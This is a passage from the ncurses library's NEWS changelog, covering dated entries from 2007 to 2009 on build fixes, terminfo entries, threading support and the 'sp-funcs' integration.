1898 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1899 1900 20090530 1901 + fix an infinite recursion when adding a legacy-coding 8-bit value 1902 using insch() (report by Clemens Ladisch). 1903 + free home-terminfo string in del_curterm() (patch by Dan Weber). 1904 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1905 1906 20090523 1907 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1908 1909 20090516 1910 + work around antique BSD game's manipulation of stdscr, etc., versus 1911 SCREEN's copy of the pointer (Debian #528411). 1912 + add a cast to wattrset macro to avoid compiler warning when comparing 1913 its result against ERR (adapted from patch by Matt Kraii, Debian 1914 #528374). 1915 1916 20090510 1917 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1918 1919 20090502 1920 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1921 + add vwmterm terminfo entry (patch by Bryan Christ). 1922 1923 20090425 1924 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1925 1926 20090419 1927 + build fix for _nc_free_and_exit() change in 20090418 (report by 1928 Christian Ebert). 1929 1930 20090418 1931 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1932 1933 20090411 1934 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 1935 This change finishes merging for menu and panel libraries, does 1936 part of the form library. 1937 1938 20090404 1939 + suppress configure check for static/dynamic linker flags for gcc on 1940 Darwin (report by Nelson Beebe). 1941 1942 20090328 1943 + extend ansi.sys pfkey capability from kf1-kf10 to kf1-kf48, moving 1944 function key definitions from emx-base for consistency -TD 1945 + correct missing final 'p' in pfkey capability of ansi.sys-old (report 1946 by Kalle Olavi Niemitalo). 1947 + improve test/ncurses.c 'F' test, show combining characters in color. 1948 + quiet a false report by cppcheck in c++/cursesw.cc by eliminating 1949 a temporary variable. 1950 + use _nc_doalloc() rather than realloc() in a few places in ncurses 1951 library to avoid leak in out-of-memory condition (reports by William 1952 Egert and Martin Ettl based on cppcheck tool). 1953 + add --with-ncurses-wrap-prefix option to test/configure (discussion 1954 with Charles Wilson). 1955 + use ncurses*-config scripts if available for test/configure. 1956 + update test/aclocal.m4 and test/configure 1957 > patches by Charles Wilson: 1958 + modify CF_WITH_LIBTOOL configure check to allow unreleased libtool 1959 version numbers (e.g. which include alphabetic chars, as well as 1960 digits, after the final '.'). 1961 + improve use of -no-undefined option for libtool by setting an 1962 intermediate variable LT_UNDEF in the configure script, and then 1963 using that in the libtool link-commands. 1964 + fix an missing use of NCURSES_PUBLIC_VAR() in tinfo/MKcodes.awk 1965 from 2009031 changes. 1966 + improve mk-1st.awk script by writing separate cases for the 1967 LIBTOOL_LINK command, depending on which library (ncurses, ticlib, 1968 termlib) is to be linked. 1969 + modify configure.in to allow broken-linker configurations, not just 1970 enable-reentrant, to set public wrap prefix. 1971 1972 20090321 1973 + add TICS_LIST and SHLIB_LIST to allow libtool 2.2.6 on Cygwin to 1974 build with tic and term libraries (patch by Charles Wilson). 1975 + add -no-undefined option to libtool for Cygwin, MinGW, U/Win and AIX 1976 (report by Charles Wilson). 1977 + fix definition for c++/Makefile.in's SHLIB_LIST, which did not list 1978 the form, menu or panel libraries (patch by Charles Wilson). 1979 + add configure option --with-wrap-prefix to allow setting the prefix 1980 for functions used to wrap global variables to something other than 1981 "_nc_" (discussion with Charles Wilson). 1982 1983 20090314 1984 + modify scripts to generate ncurses*-config and pc-files to add 1985 dependency for tinfo library (patch by Charles Wilson). 1986 + improve comparison of program-names when checking for linked flavors 1987 such as "reset" by ignoring the executable suffix (reports by Charles 1988 Wilson, Samuel Thibault and Cedric Bretaudeau on Cygwin mailing 1989 list). 1990 + suppress configure check for static/dynamic linker flags for gcc on 1991 Solaris 10, since gcc is confused by absence of static libc, and 1992 does not switch back to dynamic mode before finishing the libraries 1993 (reports by Joel Bertrand, Alan Pae). 1994 + minor fixes to Intel compiler warning checks in configure script. 1995 + modify _nc_leaks_tinfo() so leak-checking in test/railroad.c works. 1996 + modify set_curterm() to make broken-linker configuration work with 1997 changes from 20090228 (report by Charles Wilson). 1998 1999 20090228 2000 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 2001 + modify declaration of cur_term when broken-linker is used, but 2002 enable-reentrant is not, to match pre-5.7 (report by Charles Wilson). 2003 2004 20090221 2005 + continue integrating "sp-funcs" by Juergen Pfeifer (incomplete). 2006 2007 20090214 2008 + add configure script --enable-sp-funcs to enable the new set of 2009 extended functions. 2010 + start integrating patches by Juergen Pfeifer: 2011 + add extended functions which specify the SCREEN pointer for several 2012 curses functions which use the global SP (these are incomplete; 2013 some internals work is needed to complete these). 2014 + add special cases to configure script for MinGW port. 2015 2016 20090207 2017 + update several configure macros from lynx changes 2018 + append (not prepend) to CFLAGS/CPPFLAGS 2019 + change variable from PATHSEP to PATH_SEPARATOR 2020 + improve install-rules for pc-files (patch by Miroslav Lichvar). 2021 + make it work with $DESTDIR 2022 + create the pkg-config library directory if needed. 2023 2024 20090124 2025 + modify init_pair() to allow caller to create extra color pairs beyond 2026 the color_pairs limit, which use default colors (request by Emanuele 2027 Giaquinta). 2028 + add misc/terminfo.tmp and misc/*.pc to "sources" rule. 2029 + fix typo "==" where "=" is needed in ncurses-config.in and 2030 gen-pkgconfig.in files (Debian #512161). 2031 2032 20090117 2033 + add -shared option to MK_SHARED_LIB when -Bsharable is used, for 2034 *BSD's, without which "main" might be one of the shared library's 2035 dependencies (report/analysis by Ken Dickey). 2036 + modify waddch_literal(), updating line-pointer after a multicolumn 2037 character is found to not fit on the current row, and wrapping is 2038 done. Since the line-pointer was not updated, the wrapped 2039 multicolumn character was written to the beginning of the current row 2040 (cf: 20041023, reported by "Nick" regarding problem with ncmpc 2041). 2042 2043 20090110 2044 + add screen.Eterm terminfo entry (GenToo #124887) -TD 2045 + modify adacurses-config to look for ".ali" files in the adalib 2046 directory. 2047 + correct install for Ada95, which omitted libAdaCurses.a used in 2048 adacurses-config 2049 + change install for adacurses-config to provide additional flavors 2050 such as adacursesw-config, for ncursesw (GenToo #167849). 2051 2052 20090105 2053 + remove undeveloped feature in ncurses-config.in for setting 2054 prefix variable. 2055 + recent change to ncurses-config.in did not take into account the 2056 --disable-overwrite option, which sets $includedir to the 2057 subdirectory and using just that for a -I option does not work - fix 2058 (report by Frederic L W Meunier). 2059 2060 20090104 2061 + modify gen-pkgconfig.in to eliminate a dependency on rpath when 2062 deciding whether to add $LIBS to --libs output; that should be shown 2063 for the ncurses and tinfo libraries without taking rpath into 2064 account. 2065 + fix an overlooked change from $AR_OPTS to $ARFLAGS in mk-1st.awk, 2066 used in static libraries (report by Marty Jack). 2067 2068 20090103 2069 + add a configure-time check to pick a suitable value for 2070 CC_SHARED_OPTS for Solaris (report by Dagobert Michelsen). 2071 + add configure --with-pkg-config and --enable-pc-files options, along 2072 with misc/gen-pkgconfig.in which can be used to generate ".pc" files 2073 for pkg-config (request by Jan Engelhardt). 2074 + use $includedir symbol in misc/ncurses-config.in, add --includedir 2075 option. 2076 + change makefiles to use $ARFLAGS rather than $AR_OPTS, provide a 2077 configure check to detect whether a "-" is needed before "ar" 2078 options. 2079 + update config.guess, config.sub from 2080 2081 2082 20081227 2083 + modify mk-1st.awk to work with extra categories for tinfo library. 2084 + modify configure script to allow building shared libraries with gcc 2085 on AIX 5 or 6 (adapted from patch by Lital Natan). 2086 2087 20081220 2088 + modify to omit the opaque-functions from lib_gen.o when 2089 --disable-ext-funcs is used. 2090 + add test/clip_printw.c to illustrate how to use printw without 2091 wrapping. 2092 + modify ncurses 'F' test to demo wborder_set() with colored lines. 2093 + modify ncurses 'f' test to demo wborder() with colored lines. 2094 2095 20081213 2096 + add check for failure to open hashed-database needed for db4.6 2097 (GenToo #245370). 2098 + corrected --without-manpages option; previous change only suppressed 2099 the auxiliary rules install.man and uninstall.man 2100 + add case for FreeMINT to configure macro CF_XOPEN_SOURCE (patch from 2101 GenToo #250454). 2102 + fixes from NetBSD port at 2103 2104 patch-ac (build-fix for DragonFly) 2105 patch-ae (use INSTALL_SCRIPT for installing misc/ncurses*-config). 2106 + improve configure script macros CF_HEADER_PATH and CF_LIBRARY_PATH 2107 by adding CFLAGS, CPPFLAGS and LDFLAGS, LIBS values to the 2108 search-lists. 2109 + correct title string for keybound manpage (patch by Frederic Culot, 2110 OpenBSD documentation/6019), 2111 2112 20081206 2113 + move del_curterm() call from _nc_freeall() to _nc_leaks_tinfo() to 2114 work for progs/clear, progs/tabs, etc. 2115 + correct buffer-size after internal resizing of wide-character 2116 set_field_buffer(), broken in 20081018 changes (report by Mike Gran). 2117 + add "-i" option to test/filter.c to tell it to use initscr() rather 2118 than newterm(), to investigate report on comp.unix.programmer that 2119 ncurses would clear the screen in that case (it does not - the issue 2120 was xterm's alternate screen feature). 2121 + add check in mouse-driver to disable connection if GPM returns a 2122 zero, indicating that the connection is closed (Debian #506717, 2123 adapted from patch by Samuel Thibault). 2124 2125 20081129 2126 + improve a workaround in adding wide-characters, when a control 2127 character is found. The library (cf: 20040207) uses unctrl() to 2128 obtain a printable version of the control character, but was not 2129 passing color or video attributes. 2130 + improve test/ncurses.c 'a' test, using unctrl() more consistently to 2131 display meta-characters. 2132 + turn on _XOPEN_CURSES definition in curses.h 2133 + add eterm-color entry (report by Vincent Lefevre) -TD 2134 + correct use of key_name() in test/ncurses.c 'A' test, which only 2135 displays wide-characters, not key-codes since 20070612 (report by 2136 Ricardo Cantu). 2137 2138 20081122 2139 + change _nc_has_mouse() to has_mouse(), reflect its use in C++ and 2140 Ada95 (patch by Juergen Pfeifer). 2141 + document in TO-DO an issue with Cygwin's package for GNAT (report 2142 by Mike Dennison). 2143 + improve error-checking of command-line options in "tabs" program. 2144 2145 20081115 2146 + change several terminfo entries to make consistent use of ANSI 2147 clear-all-tabs -TD 2148 + add "tabs" program (prompted by Debian #502260). 2149 + add configure --without-manpages option (request by Mike Frysinger). 2150 2151 20081102 5.7 release for upload to 2152 2153 20081025 2154 + add a manpage to discuss memory leaks. 2155 + add support for shared libraries for QNX (other than libtool, which 2156 does not work well on that platform). 2157 + build-fix for QNX C++ binding. 2158 2159 20081018 2160 + build-fixes for OS/2 EMX. 2161 + modify form library to accept control characters such as newline 2162 in set_field_buffer(), which is compatible with Solaris (report by 2163 Nit Khair). 2164 + modify configure script to assume --without-hashed-db when 2165 --disable-database is used. 2166 + add "-e" option in ncurses/Makefile.in when generating source-files 2167 to force earlier exit if the build environment fails unexpectedly 2168 (prompted by patch by Adrian Bunk). 2169 + change configure script to use CF_UTF8_LIB, improved variant of 2170 CF_LIBUTF8. 2171 2172 20081012 2173 + add teraterm4.59 terminfo entry, use that as primary teraterm entry, rename 2174 original to teraterm2.3 -TD 2175 + update "gnome" terminfo to 2.22.3 -TD 2176 + update "konsole" terminfo to 1.6.6, needs today's fix for tic -TD 2177 + add "aterm" terminfo -TD 2178 + add "linux2.6.26" terminfo -TD 2179 + add logic to tic for cancelling strings in user-defined capabilities, 2180 overlooked til now. 2181 2182 20081011 2183 + regenerated html documentation. 2184 + add -m and -s options to test/keynames.c and test/key_names.c to test 2185 the meta() function with keyname() or key_name(), respectively. 2186 + correct return value of key_name() on error; it is null. 2187 + document some unresolved issues for rpath and pthreads in TO-DO. 2188 + fix a missing prototype for ioctl() on OpenBSD in tset.c 2189 + add configure option --disable-tic-depends to make explicit whether 2190 tic library depends on ncurses/ncursesw library, amends change from 2191 20080823 (prompted by Debian #501421). 2192 2193 20081004 2194 + some build-fixes for configure --disable-ext-funcs (incomplete, but 2195 works for C/C++ parts). 2196 + improve configure-check for awks unable to handle large strings, e.g. 2197 AIX 5.1 whose awk silently gives up on large printf's. 2198 2199 20080927 2200 + fix build for --with-dmalloc by workaround for redefinition of 2201 strndup between string.h and dmalloc.h 2202 + fix build for --disable-sigwinch 2203 + add environment variable NCURSES_GPM_TERMS to allow override to use 2204 GPM on terminals other than "linux", etc. 2205 + disable GPM mouse support when $TERM does not happen to contain 2206 "linux", since Gpm_Open() no longer limits its assertion to terminals 2207 that it might handle, e.g., within "screen" in xterm. 2208 + reset mouse file-descriptor when unloading GPM library (report by 2209 Miroslav Lichvar). 2210 + fix build for --disable-leaks --enable-widec --with-termlib 2211 > patch by Juergen Pfeifer: 2212 + use improved initialization for soft-label keys in Ada95 sample code. 2213 + discard internal symbol _nc_slk_format (unused since 20080112). 2214 + move call of slk_paint_info() from _nc_slk_initialize() to 2215 slk_intern_refresh(), improving initialization. 2216 2217 20080925 2218 + fix bug in mouse code for GPM from 20080920 changes (reported in 2219 Debian #500103, also Miroslav Lichvar). 2220 2221 20080920 2222 + fix shared-library rules for cygwin with tic- and tinfo-libraries. 2223 + fix a memory leak when failure to connect to GPM. 2224 + correct check for notimeout() in wgetch() (report on linux.redhat 2225 newsgroup by FurtiveBertie). 2226 + add an example warning-suppression file for valgrind, 2227 misc/ncurses.supp (based on example from Reuben Thomas) 2228 2229 20080913 2230 + change shared-library configuration for OpenBSD, make rpath work. 2231 + build-fixes for using libutf8, e.g., on OpenBSD 3.7 2232 2233 20080907 2234 + corrected fix for --enable-weak-symbols (report by Frederic L W 2235 Meunier). 2236 2237 20080906 2238 + corrected gcc options for building shared libraries on IRIX64. 2239 + add configure check for awk programs unable to handle big-strings, 2240 use that to improve the default for --enable-big-strings option. 2241 + makefile-fixes for --enable-weak-symbols (report by Frederic L W 2242 Meunier). 2243 + update test/configure script. 2244 + adapt ifdef's from library to make test/view.c build when mbrtowc() 2245 is unavailable, e.g., with HPUX 10.20. 2246 + add configure check for wcsrtombs, mbsrtowcs, which are used in 2247 test/ncurses.c, and use wcstombs, mbstowcs instead if available, 2248 fixing build of ncursew for HPUX 11.00 2249 2250 20080830 2251 + fixes to make Ada95 demo_panels() example work. 2252 + modify Ada95 'rain' test program to accept keyboard commands like the 2253 C-version. 2254 + modify BeOS-specific ifdef's to build on Haiku (patch by Scott 2255 Mccreary). 2256 + add configure-check to see if the std namespace is legal for cerr 2257 and endl, to fix a build issue with Tru64. 2258 + consistently use NCURSES_BOOL in lib_gen.c 2259 + filter #line's from lib_gen.c 2260 + change delimiter in MKlib_gen.sh from '%' to '@', to avoid 2261 substitution by IBM xlc to '#' as part of its extensions to digraphs. 2262 + update config.guess, config.sub from 2263 2264 (caveat - its maintainer removed support for older Linux systems). 2265 2266 20080823 2267 + modify configure check for pthread library to work with OSF/1 5.1, 2268 which uses #define's to associate its header and library. 2269 + use pthread_mutexattr_init() for initializing pthread_mutexattr_t, 2270 makes threaded code work on HPUX 11.23 2271 + fix a bug in demo_menus in freeing menus (cf: 20080804). 2272 + modify configure script for the case where tic library is used (and 2273 possibly renamed) to remove its dependency upon ncurses/ncursew 2274 library (patch by Dr Werner Fink). 2275 + correct manpage for menu_fore() which gave wrong default for 2276 the attribute used to display a selected entry (report by Mike Gran). 2277 + add Eterm-256color, Eterm-88color and rxvt-88color (prompted by 2278 Debian #495815) -TD 2279 2280 20080816 2281 + add configure option --enable-weak-symbols to turn on new feature. 2282 + add configure-check for availability of weak symbols. 2283 + modify linkage with pthread library to use weak symbols so that 2284 applications not linked to that library will not use the mutexes, 2285 etc. This relies on gcc, and may be platform-specific (patch by Dr 2286 Werner Fink). 2287 + add note to INSTALL to document limitation of renaming of tic library 2288 using the --with-ticlib configure option (report by Dr Werner Fink). 2289 + document (in manpage) why tputs does not detect I/O errors (prompted 2290 by comments by Samuel Thibault). 2291 + fix remaining warnings from Klocwork report. 2292 2293 20080804 2294 + modify _nc_panelhook() data to account for a permanent memory leak. 2295 + fix memory leaks in test/demo_menus 2296 + fix most warnings from Klocwork tool (report by Larry Zhou). 2297 + modify configure script CF_XOPEN_SOURCE macro to add case for 2298 "dragonfly" from xterm #236 changes. 2299 + modify configure script --with-hashed-db to let $LIBS override the 2300 search for the db library (prompted by report by Samson Pierre). 2301 2302 20080726 2303 + build-fixes for gcc 4.3.1 (changes to gnat "warnings", and C inlining 2304 thresholds). 2305 2306 20080713 2307 + build-fix (reports by Christian Ebert, Funda Wang). 2308 2309 20080712 2310 + compiler-warning fixes for Solaris. 2311 2312 20080705 2313 + use NCURSES_MOUSE_MASK() in definition of BUTTON_RELEASE(), etc., to 2314 make those work properly with the "--enable-ext-mouse" configuration 2315 (cf: 20050205). 2316 + improve documentation of build-cc options in INSTALL. 2317 + work-around a bug in gcc 4.2.4 on AIX, which does not pass the 2318 -static/-dynamic flags properly to linker, causing test/bs to 2319 not link. 2320 2321 20080628 2322 + correct some ifdef's needed for the broken-linker configuration. 2323 + make debugging library's $BAUDRATE feature work for termcap 2324 interface. 2325 + make $NCURSES_NO_PADDING feature work for termcap interface (prompted 2326 by comment on FreeBSD mailing list). 2327 + add screen.mlterm terminfo entry -TD 2328 + improve mlterm and mlterm+pcfkeys terminfo entries -TD 2329 2330 20080621 2331 + regenerated html documentation. 2332 + expand manpage description of parameters for form_driver() and 2333 menu_driver() (prompted by discussion with Adam Spragg). 2334 + add null-pointer checks for cur_term in baudrate() and 2335 def_shell_mode(), def_prog_mode() 2336 + fix some memory leaks in delscreen() and wide acs. 2337 2338 20080614 2339 + modify test/ditto.c to illustrate multi-threaded use_screen(). 2340 + change CC_SHARED_OPTS from -KPIC to -xcode=pic32 for Solaris. 2341 + add "-shared" option to MK_SHARED_LIB for gcc on Solaris (report 2342 by Poor Yorick). 2343 2344 20080607 2345 + finish changes to wgetch(), making it switch as needed to the 2346 window's actual screen when calling wrefresh() and wgetnstr(). That 2347 allows wgetch() to get used concurrently in different threads with 2348 some minor restrictions, e.g., the application should not delete a 2349 window which is being used in a wgetch(). 2350 + simplify mutex's, combining the window- and screen-mutex's. 2351 2352 20080531 2353 + modify wgetch() to use the screen which corresponds to its window 2354 parameter rather than relying on SP; some dependent functions still 2355 use SP internally. 2356 + factor out most use of SP in lib_mouse.c, using parameter. 2357 + add internal _nc_keyname(), replacing keyname() to associate with a 2358 particular SCREEN rather than the global SP. 2359 + add internal _nc_unctrl(), replacing unctrl() to associate with a 2360 particular SCREEN rather than the global SP. 2361 + add internal _nc_tracemouse(), replacing _tracemouse() to eliminate 2362 its associated global buffer _nc_globals.tracemse_buf now in SCREEN. 2363 + add internal _nc_tracechar(), replacing _tracechar() to use SCREEN in 2364 preference to the global _nc_globals.tracechr_buf buffer. 2365 2366 20080524 2367 + modify _nc_keypad() to make it switch temporarily as needed to the 2368 screen which must be updated. 2369 + wrap cur_term variable to help make _nc_keymap() thread-safe, and 2370 always set the screen's copy of this variable in set_curterm(). 2371 + restore curs_set() state after endwin()/refresh() (report/patch 2372 Miroslav Lichvar) 2373 2374 20080517 2375 + modify configure script to note that --enable-ext-colors and 2376 --enable-ext-mouse are not experimental, but extensions from 2377 the ncurses ABI 5. 2378 + corrected manpage description of setcchar() (discussion with 2379 Emanuele Giaquinta). 2380 + fix for adding a non-spacing character at the beginning of a line 2381 (report/patch by Miroslav Lichvar). 2382 2383 20080503 2384 + modify screen.* terminfo entries using new screen+fkeys to fix 2385 overridden keys in screen.rxvt (Debian #478094) -TD 2386 + modify internal interfaces to reduce wgetch()'s dependency on the 2387 global SP. 2388 + simplify some loops with macros each_screen(), each_window() and 2389 each_ripoff(). 2390 2391 20080426 2392 + continue modifying test/ditto.c toward making it demonstrate 2393 multithreaded use_screen(), using fifos to pass data between screens. 2394 + fix typo in form.3x (report by Mike Gran). 2395 2396 20080419 2397 + add screen.rxvt terminfo entry -TD 2398 + modify tic -f option to format spaces as \s to prevent them from 2399 being lost when that is read back in unformatted strings. 2400 + improve test/ditto.c, using a "talk"-style layout. 2401 2402 20080412 2403 + change test/ditto.c to use openpty() and xterm. 2404 + add locks for copywin(), dupwin(), overlap(), overlay() on their 2405 window parameters. 2406 + add locks for initscr() and newterm() on updates to the SCREEN 2407 pointer. 2408 + finish table in curs_thread.3x manpage. 2409 2410 20080405 2411 + begin table in curs_thread.3x manpage describing the scope of data 2412 used by each function (or symbol) for threading analysis. 2413 + add null-pointer checks to setsyx() and getsyx() (prompted by 2414 discussion by Martin v. Lowis and Jeroen Ruigrok van der Werven on 2415 python-dev2 mailing list). 2416 2417 20080329 2418 + add null-pointer checks in set_term() and delscreen(). 2419 + move _nc_windows into _nc_globals, since windows can be pads, which 2420 are not associated with a particular screen. 2421 + change use_screen() to pass the SCREEN* parameter rather than 2422 stdscr to the callback function. 2423 + force libtool to use tag for 'CC' in case it does not detect this, 2424 e.g., on aix when using CC=powerpc-ibm-aix5.3.0.0-gcc 2425 (report/patch by Michael Haubenwallner). 2426 + override OBJEXT to "lo" when building with libtool, to work on 2427 platforms such as AIX where libtool may use a different suffix for 2428 the object files than ".o" (report/patch by Michael Haubenwallner). 2429 + add configure --with-pthread option, for building with the POSIX 2430 thread library. 2431 2432 20080322 2433 + fill in extended-color pair two more places in wbkgrndset() and 2434 waddch_nosync() (prompted by Sedeno's patch). 2435 + fill in extended-color pair in _nc_build_wch() to make colors work 2436 for wide-characters using extended-colors (patch by Alejandro R 2437 Sedeno). 2438 + add x/X toggles to ncurses.c C color test to test/demo 2439 wide-characters with extended-colors. 2440 + add a/A toggles to ncurses.c c/C color tests. 2441 + modify test/ditto.c to use use_screen(). 2442 + finish modifying test/rain.c to demonstrate threads. 2443 2444 20080308 2445 + start modifying test/rain.c for threading demo. 2446 + modify test/ncurses.c to make 'f' test accept the f/F/b/F/</> toggles 2447 that the 'F' accepts. 2448 + modify test/worm.c to show trail in reverse-video when other threads 2449 are working concurrently. 2450 + fix a deadlock from improper nesting of mutexes for windowlist and 2451 window. 2452 2453 20080301 2454 + fixes from 20080223 resolved issue with mutexes; change to use 2455 recursive mutexes to fix memory leak in delwin() as called from 2456 _nc_free_and_exit(). 2457 2458 20080223 2459 + fix a size-difference in _nc_globals which caused hanging of mutex 2460 lock/unlock when termlib was built separately. 2461 2462 20080216 2463 + avoid using nanosleep() in threaded configuration since that often 2464 is implemented to suspend the entire process. 2465 2466 20080209 2467 + update test programs to build/work with various UNIX curses for 2468 comparisons. This was to reinvestigate statement in X/Open curses 2469 that insnstr and winsnstr perform wrapping. None of the Unix-branded 2470 implementations do this, as noted in manpage (cf: 20040228). 2471 2472 20080203 2473 + modify _nc_setupscreen() to set the legacy-coding value the same 2474 for both narrow/wide models. It had been set only for wide model, 2475 but is needed to make unctrl() work with locale in the narrow model. 2476 + improve waddch() and winsch() handling of EILSEQ from mbrtowc() by 2477 using unctrl() to display illegal bytes rather than trying to append 2478 further bytes to make up a valid sequence (reported by Andrey A 2479 Chernov). 2480 + modify unctrl() to check codes in 128-255 range versus isprint(). 2481 If they are not printable, and locale was set, use a "M-" or "~" 2482 sequence. 2483 2484 20080126 2485 + improve threading in test/worm.c (wrap refresh calls, and KEY_RESIZE 2486 handling). Now it hangs in napms(), no matter whether nanosleep() 2487 or poll() or select() are used on Linux. 2488 2489 20080119 2490 + fixes to build with --disable-ext-funcs 2491 + add manpage for use_window and use_screen. 2492 + add set_tabsize() and set_escdelay() functions. 2493 2494 20080112 2495 + remove recursive-mutex definitions, finish threading demo for worm.c 2496 + remove a redundant adjustment of lines in resizeterm.c's 2497 adjust_window() which caused occasional misadjustment of stdscr when 2498 softkeys were used. 2499 2500 20080105 2501 + several improvements to terminfo entries based on xterm #230 -TD 2502 + modify MKlib_gen.sh to handle keyname/key_name prototypes, so the 2503 "link_test" builds properly. 2504 + fix for toe command-line options -u/-U to ensure filename is given. 2505 + fix allocation-size for command-line parsing in infocmp from 20070728 2506 (report by Miroslav Lichvar) 2507 + improve resizeterm() by moving ripped-off lines, and repainting the 2508 soft-keys (report by Katarina Machalkova) 2509 + add clarification in wclear's manpage noting that the screen will be 2510 cleared even if a subwindow is cleared (prompted by Christer Enfors 2511 question). 2512 + change test/ncurses.c soft-key tests to work with KEY_RESIZE. 2513 2514 20071222 2515 + continue implementing support for threading demo by adding mutex 2516 for delwin(). 2517 2518 20071215 2519 + add several functions to C++ binding which wrap C functions that 2520 pass a WINDOW* parameter (request by Chris Lee). 2521 2522 20071201 2523 + add note about configure options needed for Berkeley database to the 2524 INSTALL file. 2525 + improve checks for version of Berkeley database libraries. 2526 + amend fix for rpath to not modify LDFLAGS if the platform has no 2527 applicable transformation (report by Christian Ebert, cf: 20071124). 2528 2529 20071124 2530 + modify configure option --with-hashed-db to accept a parameter which 2531 is the install-prefix of a given Berkeley Database (prompted by 2532 pierre4d2 comments). 2533 + rewrite wrapper for wcrtomb(), making it work on Solaris. This is 2534 used in the form library to determine the length of the buffer needed 2535 by field_buffer (report by Alfred Fung). 2536 + remove unneeded window-parameter from C++ binding for wresize (report 2537 by Chris Lee). 2538 2539 20071117 2540 + modify the support for filesystems which do not support mixed-case to 2541 generate 2-character (hexadecimal) codes for the lower-level of the 2542 filesystem terminfo database (request by Michail Vidiassov). 2543 + add configure option --enable-mixed-case, to allow overriding the 2544 configure script's check if the filesystem supports mixed-case 2545 filenames. 2546 + add wresize() to C++ binding (request by Chris Lee). 2547 + define NCURSES_EXT_FUNCS and NCURSES_EXT_COLORS in curses.h to make 2548 it simpler to tell if the extended functions and/or colors are 2549 declared. 2550 2551 20071103 2552 + update memory-leak checks for changes to names.c and codes.c 2553 + correct acsc strings in h19, z100 (patch by Benjamin C W Sittler). 2554 2555 20071020 2556 + continue implementing support for threading demo by adding mutex 2557 for use_window(). 2558 + add mrxvt terminfo entry, add/fix xterm building blocks for modified 2559 cursor keys -TD 2560 + compile with FreeBSD "contemporary" TTY interface (patch by 2561 Rong-En Fan). 2562 2563 20071013 2564 + modify makefile rules to allow clear, tput and tset to be built 2565 without libtic. The other programs (infocmp, tic and toe) rely on 2566 that library. 2567 + add/modify null-pointer checks in several functions for SP and/or 2568 the WINDOW* parameter (report by Thorben Krueger). 2569 + fixes for field_buffer() in formw library (see Redhat #310071, 2570 patches by Miroslav Lichvar). 2571 + improve performance of NCURSES_CHAR_EQ code (patch by Miroslav 2572 Lichvar). 2573 + update/improve mlterm and rxvt terminfo entries, e.g., for 2574 the modified cursor- and keypad-keys -TD 2575 2576 20071006 2577 + add code to curses.priv.h ifdef'd with NCURSES_CHAR_EQ, which 2578 changes the CharEq() macro to an inline function to allow comparing 2579 cchar_t struct's without comparing gaps in a possibly unpacked 2580 memory layout (report by Miroslav Lichvar). 2581 2582 20070929 2583 + add new functions to lib_trace.c to setup mutex's for the _tracef() 2584 calls within the ncurses library. 2585 + for the reentrant model, move _nc_tputs_trace and _nc_outchars into 2586 the SCREEN. 2587 + start modifying test/worm.c to provide threading demo (incomplete). 2588 + separated ifdef's for some BSD-related symbols in tset.c, to make 2589 it compile on LynxOS (report by Greg Gemmer). 2590 20070915 2591 + modify Ada95/gen/Makefile to use shlib script, to simplify building 2592 shared-library configuration on platforms lacking rpath support. 2593 + build-fix for Ada95/src/Makefile to reflect changed dependency for 2594 the terminal-interface-curses-aux.adb file which is now generated. 2595 + restructuring test/worm.c, for use_window() example. 2596 2597 20070908 2598 + add use_window() and use_screen() functions, to develop into support 2599 for threaded library (incomplete). 2600 + fix typos in man/curs_opaque.3x which kept the install script from 2601 creating symbolic links to two aliases created in 20070818 (report by 2602 Rong-En Fan). 2603 2604 20070901 2605 + remove a spurious newline from output of html.m4, which caused links 2606 for Ada95 html to be incorrect for the files generated using m4. 2607 + start investigating mutex's for SCREEN manipulation (incomplete). 2608 + minor cleanup of codes.c/names.c for --enable-const 2609 + expand/revise "Routine and Argument Names" section of ncurses manpage 2610 to address report by David Givens in newsgroup discussion. 2611 + fix interaction between --without-progs/--with-termcap configure 2612 options (report by Michail Vidiassov). 2613 + fix typo in "--disable-relink" option (report by Michail Vidiassov). 2614 2615 20070825 2616 + fix a sign-extension bug in infocmp's repair_acsc() function 2617 (cf: 971004). 2618 + fix old configure script bug which prevented "--disable-warnings" 2619 option from working (patch by Mike Frysinger). 2620 2621 20070818 2622 + add 9term terminal description (request by Juhapekka Tolvanen) -TD 2623 + modify comp_hash.c's string output to avoid misinterpreting a null 2624 "\0" followed by a digit. 2625 + modify MKnames.awk and MKcodes.awk to support big-strings. 2626 This only applies to the cases (broken linker, reentrant) where 2627 the corresponding arrays are accessed via wrapper functions. 2628 + split MKnames.awk into two scripts, eliminating the shell redirection 2629 which complicated the make process and also the bogus timestamp file 2630 which was introduced to fix "make -j". 2631 + add test/test_opaque.c, test/test_arrays.c 2632 + add wgetscrreg() and wgetparent() for applications that may need it 2633 when NCURSES_OPAQUE is defined (prompted by Bryan Christ). 2634 2635 20070812 2636 + amend treatment of infocmp "-r" option to retain the 1023-byte limit 2637 unless "-T" is given (cf: 981017). 2638 + modify comp_captab.c generation to use big-strings. 2639 + make _nc_capalias_table and _nc_infoalias_table private accessed via 2640 _nc_get_alias_table() since the tables are used only within the tic 2641 library. 2642 + modify configure script to skip Intel compiler in CF_C_INLINE. 2643 + make _nc_info_hash_table and _nc_cap_hash_table private accessed via 2644 _nc_get_hash_table() since the tables are used only within the tic 2645 library. 2646 2647 20070728 2648 + make _nc_capalias_table and _nc_infoalias_table private, accessed via 2649 _nc_get_alias_table() since they are used only by parse_entry.c 2650 + make _nc_key_names private since it is used only by lib_keyname.c 2651 + add --disable-big-strings configure option to control whether 2652 unctrl.c is generated using the big-string optimization - which may 2653 use strings longer than supported by a given compiler. 2654 + reduce relocation tables for tic, infocmp by changing type of 2655 internal hash tables to short, and make those private symbols. 2656 + eliminate large fixed arrays from progs/infocmp.c 2657 2658 20070721 2659 + change winnstr() to stop at the end of the line (cf: 970315). 2660 + add test/test_get_wstr.c 2661 + add test/test_getstr.c 2662 + add test/test_inwstr.c 2663 + add test/test_instr.c 2664 2665 20070716 2666 + restore a call to obtain screen-size in _nc_setupterm(), which 2667 is used in tput and other non-screen applications via setupterm() 2668 (Debian #433357, reported by Florent Bayle, Christian Ohm, 2669 cf: 20070310). 2670 2671 